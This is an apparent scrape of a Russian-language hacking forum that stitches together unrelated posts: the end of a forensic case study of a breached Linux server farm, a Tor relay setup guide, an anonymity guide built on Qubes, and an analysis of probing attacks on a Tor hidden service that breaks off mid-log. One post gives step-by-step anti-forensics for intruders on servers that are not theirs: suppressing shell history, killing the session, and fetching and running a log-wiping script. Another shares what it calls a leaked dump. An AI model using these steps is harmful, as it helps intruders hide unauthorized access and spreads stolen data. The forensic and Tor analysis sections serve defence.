Далее, вероятнее всего, преступники использовали разные утилиты постэксплуатации (к примеру, MimiPenguin) для сбора паролей от учетных записей. Как выяснилось в ходе нашего расследования, по беспечности администраторов root-пароль на всех системах был один и тот же (!). Таким образом, поломав одну машину, хакеры могли без особых усилий залогиниться на другие.

Чтобы закрепиться в системе и избежать дополнительного к себе внимания, преступники использовали учетную запись с именем, напоминающим служебное. При этом они наделили себя правами группы wheel, в частности правом на исполнение sudo. В дальнейшем, чтобы не вызывать подозрений, все несанкционированные действия выполняли только от имени этой учетки.

Помимо этого, стараясь скрыть следы своего присутствия при вероятном анализе сетевых соединений, хакеры не стали устанавливать в систему RAT. Вместо этого они завернули все свои подключения внутрь DNS-туннеля (вероятней всего, с помощью утилит, подобных Iodine или dns2tcp). Параллельно, видимо для каких-то своих целей или подстраховки, злоумышленники подняли несколько VPN- соединений на безликие серверы в азиатском регионе.

Соответственно, обладая всеми привилегиями, хакеры периодически чистили системные логи. Для этого существуют такие программы, как Wardriver Log Cleaner или Log Killer. Далее с помощью простенького, но обфусцированного скрипта на Python (библиотека Opy или ее аналог), помещенного в планировщик cron, они очищали цепочки правил iptables к состоянию «по умолчанию».

Видимо, время от времени предпринимались какие-то попытки установить дополнительные приложения и перенастроить маршрутизацию (косвенно об этом свидетельствуют частично сохранившиеся записи в Syslog об ошибках). На схожие мысли наводят и невычищенные остатки несовместимых библиотек и пакетов и, как следствие, слишком частые перезагрузки системы.

Неудивительно, что попытки восстановить систему из резервных копий нужного эффекта не приносили, а пароль для root долгое время считался надежным и не менялся. При этом зияющая дыра Dirty Cow по-прежнему открывала хакерам полный доступ к гипервизору. Это и объясняет, почему не было обнаружено никаких следов малвари в скомпрометированных системах, ведь она и не требовалась для проникновения внутрь.

Веб под прицелом
Взлом внутреннего веб-сервера, в недрах которого была база данных клиентов и локальная CRM, оказался вторым вектором атаки, никак не связанным с эксплуатацией Dirty Cow. Если кратко, то в движке PHP была найдена LFI- уязвимость. С ней можно открыть или запустить любой файл на сервере в обход политик разграничения доступа. В результате реализации этой атаки был получен доступ к системной директории /proc/self/environ, что, по сути, служит путем к запуску любого процесса в хостовой системе, в том числе к получению доступа в /etc/passwd.

Далее, эксплуатируя непропатченное ядро Linux, злоумышленники эскалировали привилегии до суперпользователя (использовались относительно свежие уязвимости CVE-2018-1000001 и CVE-2018-1068). После этого для получения абсолютного контроля над системой хакер залил на сервер самописный SUID и с помощью модификации прав на создание, чтение и запуск локальных файлов накатил веб-оболочку под названием b374k.

Таким образом, b374k мог теперь успешно функционировать через ранее залитый SUID даже после возможного патча ядра ОС. Почувствовав себя свободнее, злоумышленники приступили к правке конфигурационных параметров веб-сервера Apache, добавили скрипты и модифицировали PHP-код некоторых страниц. В результате у них появилась возможность дампа базы данных пользователей и добавления ссылок на сторонние сайты с вирусным ПО.

Майнеры поневоле
После детального анализа дампа оперативной памяти и последовательного разбора всех системных и пользовательских процессов было обнаружено несколько «тяжелых» задач, потреблявших значительные ресурсы CPU и RAM. При этом файлы, принадлежащие этим процессам, появились относительно недавно и не соответствовали каким-либо зависимостям в установленном ПО.

При подробном изучении эти файлы оказались обфусцированными скриптами и дополнительными библиотеками модифицированного вируса-майнера. Именно из-за него происходили периодические пиковые нагрузки системы, генерация большого количества «служебного» сетевого трафика, разнообразные сбои системных демонов и тому подобное нестабильное поведение.

Зомби-апокалипсис
По всей видимости, производительность оборудования и количество гигахешей злоумышленников не удовлетворили, и они решили переориентироваться на рассылку спама и проведение DoS-атак из подконтрольного ботнета. После исследования жестких дисков скомпрометированных машин на нескольких из них были обнаружены следы инструмента Ufonet, которая служит для объединения подконтрольных машин в пул для генерации DoS-трафика, а также устнаовленные версии конструктора ботнета BYOB (Build Your Own Botnet).

Последнее меня удивило, поскольку более шаблонный вариант платформы для сборки ботнета придумать, вообще говоря, сложно. И, как бы странно это ни звучало, эта утилита не определилась ни одним AV-движком, которым проверяли инфицированные диски. Однако полноценно использовать машины для DoS-атак хакеры почему-то либо не смогли, либо не захотели.

А вот рассылка спама стала настоящей головной болью для владельцев хостинга. Причем в данном случае зараженные зомби-машины не сами были источником спама, а служили лишь транзитными узлами для дальнейшей доставки. Таким образом, трафик с нежелательной корреспонденцией изначально генерировался в неблагонадежном диапазоне IP-адресов с сомнительной репутацией, а далее транслировался уже от имени ячейки.

Этим и объясняются частые перебои с обслуживанием корпоративной почты клиентов, отказ в доставке писем и внесение IP-адресов в список спамеров и неблагонадежных ресурсов интернета.

Подводим итоги
Думаю, в первую очередь следует перечислить те несколько промахов и упущений, которые позволили бы клиентам если не пресечь атаку полностью, то хотя бы минимизировать причиненный ущерб.

Банальная, но очевидная вещь — это устаревшие, необновленные или вовсе уже не поддерживаемые версии программ. Во многих случаях именно на их уязвимости обращают внимание злоумышленники. В частности, из-за критической уязвимости в ядре ОС хакеры смогли получить полный доступ к атакуемой системе.

Если нет возможности пользоваться универсальными комбайнами вроде Nessus, Nexpose или Qualys, то всегда стоит рассмотреть, может, и не такие навороченные, но вполне работоспособные open source альтернативы. Например, упомянутый Nmap с плагинами.

Кроме того, к столь печальным последствиям привело и отсутствие средств централизованного аудита ИБ и мониторинга событий. Причем даже не так важно, коммерческая ли это SIEM-система или свободное решение на базе Zabbix, ELK или OSSIM. Главное, чтобы была возможность вовремя обнаружить IoC, незамедлительно среагировать на них и оперативно приостановить развитие атаки.

Также стоит отметить халатное отношение к обеспечению базового уровня защищенности Linux-систем (в западной литературе известно как security hardening).

Ну и наконец, нарушения организационных мер безопасности, такие как использование одного и того же root-пароля на всех серверах, хранение в одном контуре информации разного уровня конфиденциальности (персональных данных и финансовой отчетности), отсутствие полноценного контроля доступа для сотрудников и прочее. Все это, к сожалению, только усилило эффект от уже случившегося взлома.

Заключение
Сегодня мы с вами размотали запутанный и серьезный форензик кейс взлома серверной фермы под управлением Linux. Вы увидели, какие утилиты используются для сбора данных, создания дампов, поиска артефактов, выявления следов хакерских инстрментов и восстановления сценария взлома. Теперь вы знаете некоторые секреты, техники и приемы, которые используют эксперты-криминалисты в своем нелегком (но интересном) труде.

Автор @I/O aka invern0
взято с spy-soft.net

Интересный слив по фронтон 16

ID: 676533bbb4103b69df371cf9
Thread ID: 35579
Created: 2020-03-19T13:58:10+0000
Last Post: 2020-03-20T15:49:26+0000
Author: GoogleFI
Replies: 3 Views: 2K

слили у них

малоли кому то пригодится

You must spend at least 30 day(s) on the forum to view the content.

MEGA

MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now

mega.nz

БЫТЬ РЕЛЕ В СЕТИ ТОР.

ID: 676533bbb4103b69df371cfb
Thread ID: 35506
Created: 2020-03-14T10:31:13+0000
Last Post: 2020-03-14T10:31:13+0000
Author: Respe
Prefix: Статья
Replies: 0 Views: 2K

Tor, “The Onion Routing " - это программный проект, разработанный для анонимизации действий пользователей в интернете.Скрывая и шифруя фактические идентификаторы пользователей через свои собственные узлы, мы будем участвовать в этой структуре.

В этой статье мы дадим вам возможность быть реле в этой сети, так что вы будете посредником.Трафик будет проходить по вашей ссылке, чтобы вы могли внести свой вклад в ТОР.Не бойтесь, вы не несете ответственности за то, что было сделано на Tor, в результате вы являетесь посредником, соединение будет проходить только непосредственно над вами, а затем закончится через Exit Relay, а мы будем только Relay, так что мы будем только одним элементом декомпозиции.
В первую очередь все, что вам нужно сделать, это настроить ntp в вашей системе важно, чтобы ваши системные часы были обновлены и синхронизированы.Для этого:

Code:Copy to clipboard

sudo apt-get install ntp

Если вы даете команду, то определить серверы, для этого российские серверы могут быть выбраны, не имеет значения, достаточно ли они совместимы.

Code:Copy to clipboard

sudo nano /etc/ntp.conf

В него вы добавите следующие строки и обновите серверы.

Code:Copy to clipboard

server 0.ru.pool.ntp.org server 1.ru.pool.ntp.org server 2.ru.pool.ntp.org server 3.ru.pool.ntp.org

Да, теперь, когда часы встали на свои рельсы, давайте начнем фактические операции.Тор должен быть установлен в вашей системе.Если он не установлен, вы можете установить его со следующей командой >

Code:Copy to clipboard

sudo apt-get install tor

Рядом с пакетом Tor будет установлено еще несколько октября.После этой установки нам нужно настроить фазу реле. Если конфигурация не выполнена, вы не используете ее.

Code:Copy to clipboard

sudo nano /etc/tor/torrc

Чтобы содержимое файла было предварительно заполнено набором параметров, но не запущено, вам нужно отредактировать его следующим образом.

Code:Copy to clipboard

RunAsDaemon 1 ORPort 9001 DirPort 9030 ExitPolicy reject *:* Nickname ox2e88ce4 RelayBandwidthRate 1 MB RelayBandwidthBurst 2 MB AccountingStart month 1 00:00 AccountingMax 100 GB DisableDebuggerAttachment 0

С другой стороны, мы можем определить вышеуказанные параметры следующим образом.

RunAsDeamon-определяет услуги в системе.

Выходной порт ORPort – Tor позволяет общаться с другими клиентами

Это порт, где вы можете объявить каталог DirPort-Tor.Рекомендуется использовать его, если ваш трафик неограничен или достаточен

ExitPolicy-вы можете определить, будете ли вы элементом декомпозиции с помощью этих команд мы решили быть промежуточным элементом, т. е. просто relay, говоря reject *:*

Nickname – псевдоним, который вы можете использовать в системе

RelayBandwidthRate-определяет скорость сети, которую может использовать Tor.

RelayBandwidthBurst-определяет максимальную скорость сети, которую может использовать Tor.

AccountingStart-вы можете ввести его, если хотите, чтобы счетчик трафика вашей учетной записи начинался в какое время.Вы можете идентифицировать ежемесячно, еженедельно или ежедневно.

AccountingMax-указывает максимальный общий трафик, который Tor может использовать в вашей системе.

DisableDebuggerAttachment-отключает режим отладки.

Параметры, которые я указал, являются параметрами, которые мы можем назвать обязательными, чтобы вы могли быть реле.Если у вас есть какой-либо сервер, и вы хотите сделать это Exit Relay(выходной элемент), вам нужно пойти по другому пути.

Вы должны быть осторожны во время Exit Relay, потому что весь трафик закончится у вас, так что, если человек выполнит какую-либо незаконную работу, наконец, появится ваш ip-адрес, и в этот момент Вы должны настроить свою конфигурацию на своем сервере в соответствии с ним и в хорошем смысле.Если ваши настройки закончены, вам придется перезапустить процесс Tor, чтобы настройки, которые вы только что определили, действовали.

Code:Copy to clipboard

sudo service tor restart

Вы можете определить, работает ли он или как продвигается процесс, посмотрев записи журнала в системе.Если он дал вывод, как показано ниже, вы на правильном пути.

Если вы добрались сюда без проблем, теперь вы выглядите как реле в сети tor, и вам был предоставлен идентификатор идентификатора uniq.Если вы хотите управлять и просматривать его, просто установите следующий пакет.

Code:Copy to clipboard

sudo apt-get install tor-arm

После установки есть проблема, которую вы должны преодолеть. tor-arm должен использоваться определенным пользователем, который является пользователем debian-tor, который сам по себе определен, поэтому при выполнении отслеживания вы не можете правильно получить бесполезную статистику, если вы говорите и открываете arm напрямую.Правильная команда выглядит следующим образом;

Code:Copy to clipboard

sudo -u debian-tor arm

Мы дали нашу команду, и теперь вы можете увидеть, сколько трафика вы тратите, вы можете внести коррективы здесь.

Дело кончилось надеюсь, вам понравилось.. Делая эти операции, существует анонимность высокого уровня.Добрый день, респе представил.

OpenVPN client over OpenVPN client

ID: 676533bbb4103b69df371cfe
Thread ID: 35210
Created: 2020-02-26T16:41:58+0000
Last Post: 2020-02-27T21:06:31+0000
Author: top
Replies: 2 Views: 2K

Подскажите, а OpenVPN клиент поверз друг друга будет пахать? например, я на роутере подниму клиент, заверну траф, а потом на конечной машине еще раз OpenVPN клиент запущу
как он себя будет вести?

Заметаем следы присутствия на OS семейства Linux

ID: 676533bbb4103b69df371cff
Thread ID: 35230
Created: 2020-02-27T20:50:20+0000
Last Post: 2020-02-27T20:50:20+0000
Author: tabac
Replies: 0 Views: 2K

Здесь пойдет речь о сокрытии своего присутствия на чужих серверах OS семейства Linux. Если вам удалось любым образом получить доступ к чужому серверу, важно беспалевно пользоваться доступом.

Команды, с помощью которых можно узнать об удаленных сеансах и подключениях к серверу.

w - unix-утилита, показывающая информацию о работающих в данный момент на машине пользователях и о их процессах. Для каждого пользователя выводятся следующие записи: регистрационное имя, название терминала, удалённая машина, время регистрации в системе, время простоя, JCPU, PCPU и командную строку его текущего процесса.

Если утилита w показывает текущих пользователей в системе, а мы хотим узнать список всех когда-либо подключившихся пользователей, то на этот случай существует утилита "last".

last - unix-утилита, отображающая список последних терминальных сессий с выборкой по пользователю или терминалу. Все события при этом упорядочены по времени.

Существуют утилиты who и lastlog, они похожи на last, поэтому нет смысла рассматривать.

history - история выполнения. История запущенных команд сохраняется в файле ~/.bash_history. Перечислим некоторые способы, чтобы избежать их логирования:

Первый способ - просто набирайте перед каждой командой пробел, тогда команда не попадет ~/.bash_history

Code:Copy to clipboard

[space][command]

Второй – после подключения к серверу и до ввода своих команд, наберите:

Code:Copy to clipboard

export HISTFILE=/dev/null

Третий – если вы забыли выполнить второй пункт, то выполните:

Code:Copy to clipboard

unset HISTFILE unset SAVEHIST

Тогда все команды введенные в рамках вашей сессии не попадут в ~/.bash_history

Code:Copy to clipboard

kill -9 $$

закрывает сессию не сохраняя историю команд

Code:Copy to clipboard

cat /dev/null > ~/.bash_history && history -c

Чистка.

И наконец представляю вашему вниманию скрипт, который выполнит за вас всю грязную работу и сотрет все ваши следы с системы. Для того чтобы им воспользоваться достаточно выполнить следующее:

Code:Copy to clipboard

wget https://raw.githubusercontent.com/JusticeRage/freedomfighting/master/nojail.py python nojail.py --user [пользователь от которого вы подключались] --ip [с которого вы подкючались] --hostname [имя хоста с которым вы работали]

и запустить с нужными параметрами, описание которых вы найдете в Readme. После запуска активность удаляется из всех файлов логов.

по материалам ActionNum

Анонимность через изоляцию

ID: 676533bbb4103b69df371d01
Thread ID: 34913
Created: 2020-02-12T12:34:20+0000
Last Post: 2020-02-12T20:22:02+0000
Author: Chook
Prefix: Статья
Replies: 2 Views: 2K

Это вторая часть статьи, где будет рассказано, про подход анонимности через изоляцию.
Дисклеймер: по итогу этой статьи, я надеюсь, осуществите переход на qubes. Тут не будет ничего нового, для тех, кто уже использует эту ОС, это всего лишь агитация пользователей которые этого не делают.
Предупреждение! Если вы не читаете документацию, то ничего вас спасити не сможет, нет такой системы, что заходя на личный аккаунт вк, вы останитесь анонимным.
Итак, посмотрим какие же риски несет использование даже на первый взгляд, надежное программное обеспечение. Уже наверное большинство знает, про то, что пользоваться надо open source продуктами. Но это не гарантия отсутствия бэкдоров. Кроме того что их можно скрыть в исходниках, еще на самом деле при компиляции исходных кодов, происходит оптимизация кода, компилятором. И не всегда компилируя одну и ту же программу вы получите одно и то же. Но даже это не главное, создать программу без уязвимостей, практически невозможно, для этого математически нужно доказывать что при любой ситуации все работает корректно, но это сделать, на практике для больших проектов невозможно. То есть по факту если посмотреть, историю практически любой исследованной программы, то можно увидеть, часто даже более десятка, моментов, когда можно взломать ее любого пользователя. И даже если уязвимостей нет, то при деньгах, причем возможно не таких и больших, можно эти уязвимости найти Но тут есть еще одна проблема, программы могут теч, как из за неправильной настройки, так и из за самой архитектуры. Что, никак от этого не спаситись? Выход есть, это qubes. Это грубо говоря, хостовая ОС, работающая как virtualbox, разве что она безопаснее, так и расчитанна как раз на постоянное использование различных виртуальных машин, на что virtualbox неспособен. Кроме этого, у этой системы, все процессы работают изолированно друг от друга, что сводит риски компрометации к минимуму.
Так вот, что можно делать на этой системе, насколько трудно в ней работать, насколько падает производительность, ну и наконец насколько она вам нужна?
Чтобы по подробнее понять как все работает, как выглядит, рекомендую посмотреть вот этот обзор,

. И хотя этот обзор на английском все рассказано простым языком, да и так все понятно даже интуитивно. Вы поймете как там все работает, там же рассказывается про настройку qubes + whonix.
Итак, что же вы можете делать, с помощью qubes. Не знаю задумывались ли вы, но например, когда вы включаете vpn, то те программы, которые знают как старый так и новый ip могут вас деанонимизировать. Кроме этого vpn не мешает определить, что "все вот эти аккаунты принадлижат одному человеку". Так вот, в этой OS, легко можно построить любые цепочки анонимности, просто «соединяя блоки» с vpn, whonix, i2p и т.д.
Внимание! Если вы не правильно настройте vpn, qubes не спасет от утечки(правильные настройки можно найти на сайтах qubes и whonix). Кроме того, если вы не до конца понимаете, что и зачем прятать, зачем вам нужен vpn в этой цепочке(ну то что вы капчу обойти хотите, не аргумент, потому что ее можно обойти по другому, причем это будет возможно даже анонимнее). Просто везде используйте whonix, без дополнительных блоков, это лучший вариант, в том плане, что труднее лажонуть и допустить утечку, да и следов вы так оставите куда меньше. И исследовано, это куда больше, это то на что и рассчитан qubes.
Кроме этого, можно использовать несколько различных операционных систем одновременно как линукс так и windows. Есть одноразовые виртуальные машины, уничтожаются при закрытии. Qubes позволяет пользователям разделять различные части своей цифровой жизни в хорошо изолированные отсеки, по надежности почти такой же как и в случае с физической изоляцией.
Теперь рассмотрим, на примере, например кодера, как можно применить это все на практике.
Я расчитываю, что вы уже применяете [советы Йоанны Рутовской](https://blog.invisiblethings.org/2011/03/13/partitioning-my- digital-life-into.html), по разделению ролей. Я не буду описывать [базовое применение кубов](https://blog.invisiblethings.org/2011/03/13/partitioning-my- digital-life-into.html), а приведу пример надстройки на него.
Итак, решили мы разработать программу, но боимся, что за это нам может прилететь, времени досконально разбираться что и как работает нет. Что же делать? Выход есть причем достаточно простой.
Ну во первых, начнем с того, что расскажу вам про подход «плодов отравленного дерева». То есть уровень вашей анонимности, стоит расчитывать как уровень самого слабого звена. Значит засветив что то, например, процесс поиска исходников, возможно стоит отказаться от продолжения работы, или использовать что то другое. Ну или вы например что то писали на неаноимной системе, и exe улетел в интернет. Не переписывая программу с 0, можно определить, что новый exe, созданный уже на анонимной системе, всего лишь новая версия старого по. Разумеется искать вас будут искать по самой первой версией программы.
Итак все таки начнем. Самое очевидное, это то что разрабатывать программу вы должны в отдельной виртуальной системе которая никогда не соединиться с интернетом. Но даже это не панацея, ваша ос и среда разработки, должна быть скачана, анонимно. Лучше всего использовать не уникальные билды, а те, чем пользуются как можно большим количеством людей (ну например образ ос распространяемый официальным сайтом Microsoft, желательно английской версией, имя пользователя admin или user). Если вы разрабатываете несколько различных программ, модулей. И не хотите, чтобы смогли определить что их пишет один и тот же человек, компилируйте, все на разных, не связанных ос(лучше скачать новый образ для этого, и новую среду разработки), причем копировать туда исходники для компиляции стоит с помощью блокнота, вырезав от туда изначально все буквы кроме английских.(мы рассчитываем, что все среды разработки и ос оставляют инфу, которую мы не можем обнаружить и вырезать)
Теперь, что же делать, если нужно протестировать сетевой код, на помощь вам придет этот гайд вы просто разрешаете сетевое взаимодействие между двумя системами. Если же он должен взаимодействовать например с сайтами из интернета, к которым у вас нет бэкенда, то используйте whonix. И хотя вы не сможете таким образом спрятать факт разработки программы, вы все равно останетесь анонимными. Искать в интернете инфу, надо с помощью временной whonix-ws(или гугл хром, там есть встроенный переводчик сайтов, но это не так анонимно). Каждый новый вопрос лучше всего задавать с нового аккаунта, чтобы труднее было определить что именно вы пишите(Вопросы надо задавать в клирнете, например на stackoverflow, можно придумать, легенду, зачем вам "p2p",а можно и не придумывать, но говорить для чего реально это вам нужно не нужно, но смотрите, тех то такие вопросы задает, либо ищет ответы на них, попадают в черные списки, соблюдайте все правила анонимности, чтобы вас не нашли)
Так кому же это все нужно, ну во первых как вы уже догадываетесь кодерам и исследователям безопасности Уже есть шаблоны BlackArch, Kali, PTF. Да и вообще всем кто серьезно обеспокоен своей анонимностью и безопасностью, забегая вперед, скажу, что для защиты от ИИ, реч о которой пойдет в следующей главе, тоже будет очень полезна, применение именно этой ОС.
Трудно разобраться в этой системе по сравнению с windows?
Смотря как вы будите ее использовать. Труднее чем с ubuntu, но даже если вообще никогда linux в глаза не видели, все равно сможете разобраться, но это потребует времени.
Трудно разобраться в этой системе по сравнению с linux?
Придётся читать документацию на официальном сайте. Но все не так уж и трудно. Просто стандартные действия, что происходят в других дистрибутивах автоматически, такие как подключенные флешки, копирование и вставка и т.д. Несущие серьезные угрозы безопасности, тут требуют дополнительных действий с вашей стороны. Но беспокоиться не надо, разобравшись с этим, это уже не будет отнимать у вас дополнительного времени.
Поговорим теперь о том, насколько мощным должен быть у вас компьютер.

Spoiler: системные требования

Примечание . Системные требования на этой странице необходимы, но не достаточны для обеспечения совместимости с Qubes на минимальном или рекомендованном уровне. Другими словами, только то, что компьютер удовлетворяет этим требованиям, не означает, что Qubes будет успешно установлен и запущен на нем. Мы настоятельно рекомендуем обратиться к списку совместимого оборудования, чтобы убедиться, что Qubes можно установить и запустить на вашей конкретной модели так, как вам нужно.
Минимальные
64-разрядный процессор Intel или AMD (x86_64 или 64-разрядный AMD64)
Intel VT-x с EPT или AMD-V с RVI
Intel VT-d или AMD-Vi (также известный как AMD IOMMU)
4 ГБ ОЗУ
32 ГБ дискового пространства
Рекомендуемые
Быстрый SSD (настоятельно рекомендуется)
Intel IGP (настоятельно рекомендуется)
Графические процессоры Nvidia могут потребовать значительного устранения неполадок .
Графические процессоры AMD официально не тестировались, но Radeon (RX580 и более ранние) обычно работают хорошо
Смотрите список совместимого оборудования
TPM с соответствующей поддержкой BIOS (требуется для Anti Evil Maid )
Клавиатура без USB или несколько контроллеров USB
Кроме того, учитывайте требования по сертификации аппаратных средств для Qubes 4.x .

Подробнее тут.

Опять же, если вы работаете с большим количеством виртуальных машин, то вам придётся докупить оперативной памяти, но если вам это реально нужно, то наверняка и деньги на 16/32 гигабайта у вас найдутся)
Насколько падает производительность? Меньше чем на virtualbox, потому что Xen на котором работает qubes, действует на более низком уровне. То есть работать на ней можно. К стати, хотя поиграть в игры на такой системе не удастся, [можно поставить рядом с qubes, например windows](https://www.qubes- os.org/doc/multiboot/), желательно без доступа к интернету.
P.S. Qubes, это конечно очень хорошо и необходимо, но гораздо важнее, использовать то что написано в первой части, потому как находят большенство не через уязвимости, и хитрые атаки, а через сбор доступной информации и оперативной деятельностью(вашем поведением в реальной жизни). Ну и по денежному следу, о котором я вам уже что то рассказал, еще немного добавлю в следующей главе. Но вообще с такими вопросами нужно идти к хорошему налоговому оптимизатору.
P.S.S. Опять отсылаю вас к списку, что указаны в конце первой главы, вам просто необходимо все это прочитать, в особенности документацию с сайта whonix, для того чтобы по подробнее разобраться во всем, невозможно уложить все важное в всего пару статей.
Надеюсь я тебя убедил, и ты поставишь qubes. Потому как знал но не использовал = не знал.

«Я тебя по IP вычислю»: как хакеры рассекречивают звенья цепи Tor

ID: 676533bbb4103b69df371d02
Thread ID: 34872
Created: 2020-02-10T09:34:38+0000
Last Post: 2020-02-10T09:34:38+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 2K

Рассказ о видах необычных атак на relay и guard узлы Tor и решениях, которые предложил автор блога The Hacker Factor.

С момента запуска службы Tor, предоставляющей доступ к Internet Archive, я повидал широкий спектр атак на основе Tor и задокументировал многие из них в различных записях блога. Например:

Attacked Over Tor: 3 плохих бота, 1 агрессивный сканер и 1 атакующий бот.

Остановка атак Tor: способы подавления агрессивных DDoS-ботов.

Возвращение атак Tor: множество различных типов атак, с которыми мой сервер столкнулся через соединение Tor.

Новая атака Tor: обновленное решение для обновленного метода атаки.

Но в последний месяц я заметил новый тип атаки. Мне потребовалось некоторое время, чтобы понять, что пытается сделать атакующая сторона. Похоже, попытка состояла в том, чтобы составить частичный план цепочки серверов Tor, используемых моей скрытой службой.

Примечание: В этой публикации вы увидите два типа написания: Tor и tor. Заглавная буква используется для имени протокола, строчная – для имени программы.

Типичное обращение
Чтобы идентифицировать атаки, нужно сначала определить типичное обращение. К сожалению, даже в режиме полной отладки базовый исходный код tor-демона не предоставляет достаточно информации. Я изменил свою копию исходного кода, чтобы сделать ее более информативной. Например, мой tor-демон регистрирует каждую точку встречи (rendezvous point). По сути, я отредактировал src/or/rendservice.c и добавил инструкцию print в функцию rend_service_receive_introduction:

Code:Copy to clipboard

tor_assert (launched-> build_state); / ** Войти в точку встречи ** / log_warn (LD_REND, "Rendezvous [% s]", safe_str_client (exte_info_describe (rp))); / * Заполнить состояние цепочки. * /

Прежде чем кто-либо спросит : нет, это не нарушает конфиденциальность. Rendezvous – это промежуточный узел, расположенный за пределами исходных каналов, установленных как браузером, так и службой. И да, журналы автоматически удаляются через неделю.

При типичном обращении я увижу, как демон tor подключается к точке Rendezvous, а через мгновение образуется множество HTTP-соединений с сервером. Например, это я подключаюсь к своему серверу с помощью Tor браузера:

Code:Copy to clipboard

Jan 30 09:26:51 Tor[24247]: Rendezvous [$F5746F6257DFE87E3A90753C2A0439926C55552F~$F5746F6257DFE87E3A at 82.169.130.61] [30/Jan/2020:09:26:54 -0700] "archivecrfip2lpi.onion" 200 10301 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" [30/Jan/2020:09:26:54 -0700] "archivecrfip2lpi.onion" 200 7312 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" [30/Jan/2020:09:26:54 -0700] "archivecrfip2lpi.onion" 200 6492 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" [30/Jan/2020:09:26:54 -0700] "archivecrfip2lpi.onion" 200 3827 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0"

IP-адрес от точки rendezvous всегда является узлом Tor, а шестнадцатеричные значения перед ним являются уникальным отпечатком узла Tor. Это публичная информация, вы можете посмотреть её на metrics.torproject.org. В этом случае узел Randezvous имеет псевдоним Hijnn, он существует по адресу 82.169.130.61, и когда я писал этот текст, он работал уже 8 дней 21 час 32 минуты и 47 секунд.

В Tor входной узел guard может быть и внесён в публичный список, и нет. Узлы guard, не включенные в список, обычно зарезервированы как bridges – они не включены в список для предотвращения цензурирования по IP. Однако узлы ретрансляции, встречи и выхода должны быть общедоступными, так как через них идет большой объем трафика Tor. Это часть анонимности Tor: ваш трафик неотличим от остального.

Примечание. Технически вы можете запустить собственный частный выходной узел, но это аннулирует цель. Если вы единственный пользователь, использующий свой выходной узел, то сетевую активность можно сопоставить вашей персоне. По той же причине узел rendezvous должен быть общедоступной службой, чтобы трафик мог смешаться и быть анонимным. Не используйте собственный узел rendezvous, если не хотите показать вашу активность.

Типичное обращение и боты
Многие боты имеют поведение отличное от типичного. Например, могут одновременно выполнять только единственное однопоточное HTTP-соединение. Плохо написанные боты будут выполнять один HTTP-запрос на один узел rendezvous. Однако агрессивные боты могут быть обнаружены по тому факту, что они согласовывают несколько узлов встречи перед отправкой через них большого количества HTTP-запросов. Например:

Code:Copy to clipboard

Jan 30 14:19:22 Tor[17199]: Rendezvous [$1B710612CB33CA26B7CF9964DFE79E60B45FAF60~$1B710612CB33CA26B7 at 35.228.99.44] Jan 30 14:19:22 Tor[17199]: Rendezvous [$BFC1305C8B37E5161C2E37135DF2D4E53CC38ACE~$BFC1305C8B37E5161C at 188.68.46.164] Jan 30 14:19:22 Tor[17199]: Rendezvous [$53134D9637D9FBE565FA1E3AF82B23CC964C56D6~$53134D9637D9FBE565 at 37.59.76.255] Jan 30 14:19:22 Tor[17199]: Rendezvous [$41EEC4CFA01E8982643F1AF3CD84315329D2B58E~$41EEC4CFA01E898264 at 95.211.147.99] Jan 30 14:19:22 Tor[17199]: Rendezvous [$2A621A40FF3081F612946FDFB8DC781BCE859A05~$2A621A40FF3081F612 at 116.203.88.24] Jan 30 14:19:22 Tor[17199]: Rendezvous [$861BCFDD148973985E7FE97C7455C9E4AC4E13BE~$861BCFDD148973985E at 148.251.22.104] Jan 30 14:19:22 Tor[17199]: Rendezvous: Circuit closing Jan 30 14:19:22 Tor[17199]: Rendezvous [$C0E6A667064385B9CB5A685CEB06B85EDDA6AA00~$C0E6A667064385B9CB at 77.123.155.45] Jan 30 14:19:22 Tor[17199]: Rendezvous [$204ECC4FF8F93862E82FA19C53B5BC98B1AF6046~$204ECC4FF8F93862E8 at 54.37.207.84] Jan 30 14:19:22 Tor[17199]: Rendezvous: Circuit closing Jan 30 14:19:22 Tor[17199]: Rendezvous [$964B4E8A75263A69769541F2764563DABDD995D2~$964B4E8A75263A6976 at 68.67.32.31] Jan 30 14:19:22 Tor[17199]: Rendezvous [$F1FE9BEF7DE30B2BA1547270495A6CE662C9C9E5~$F1FE9BEF7DE30B2BA1 at 83.162.159.206] Jan 30 14:19:22 Tor[17199]: Rendezvous [$E2CF09F998248C71139B24B2C92740AEDB1C6D2A~$E2CF09F998248C7113 at 107.180.239.164] Jan 30 14:19:22 Tor[17199]: Rendezvous [$75A931404453030821C547A4FAA9094A06C48C7A~$75A931404453030821 at 46.101.183.160] Jan 30 14:19:22 Tor[17199]: Rendezvous [$A0547D9D5383B4A6314CBAF3006EAECA197CD82F~$A0547D9D5383B4A631 at 148.251.137.3] [30/Jan/2020:14:19:22 -0700] "web.archivecrfip2lpi.onion" 404 7782 "" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" Jan 30 14:19:22 Tor[17199]: Rendezvous [$CE1FD7659F2DFE92B883083C0C6C974616D17F3D~$CE1FD7659F2DFE92B8 at 185.15.72.62] Jan 30 14:19:22 Tor[17199]: Rendezvous [$24B1DF80768332990BA8F1230BA41D95D82D52BD~$24B1DF80768332990B at 81.7.10.86] Jan 30 14:19:22 Tor[17199]: Rendezvous: Circuit closing Jan 30 14:19:22 Tor[17199]: Rendezvous: Circuit closing Jan 30 14:19:22 Tor[17199]: Rendezvous [$6940247E04C839D268543E7F62566A91E40567E3~$6940247E04C839D268 at 176.9.57.152] Jan 30 14:19:22 Tor[17199]: Rendezvous [$E95955CD7AB012DE770711878F147C784FC13D37~$E95955CD7AB012DE77 at 164.132.226.30] Jan 30 14:19:22 Tor[17199]: Rendezvous [$24F97F98C45E4754655BE66799049763DAEE99CE~$24F97F98C45E475465 at 136.243.4.139] Jan 30 14:19:22 Tor[17199]: Rendezvous [$B630BE802A803403F4BBEDF1C4B7BE7B31A89305~$B630BE802A803403F4 at 212.51.159.148] Jan 30 14:19:22 Tor[17199]: Rendezvous [$00D2269DBC1A39D137160789C7B614197DB30C70~$00D2269DBC1A39D137 at 51.15.97.42] Jan 30 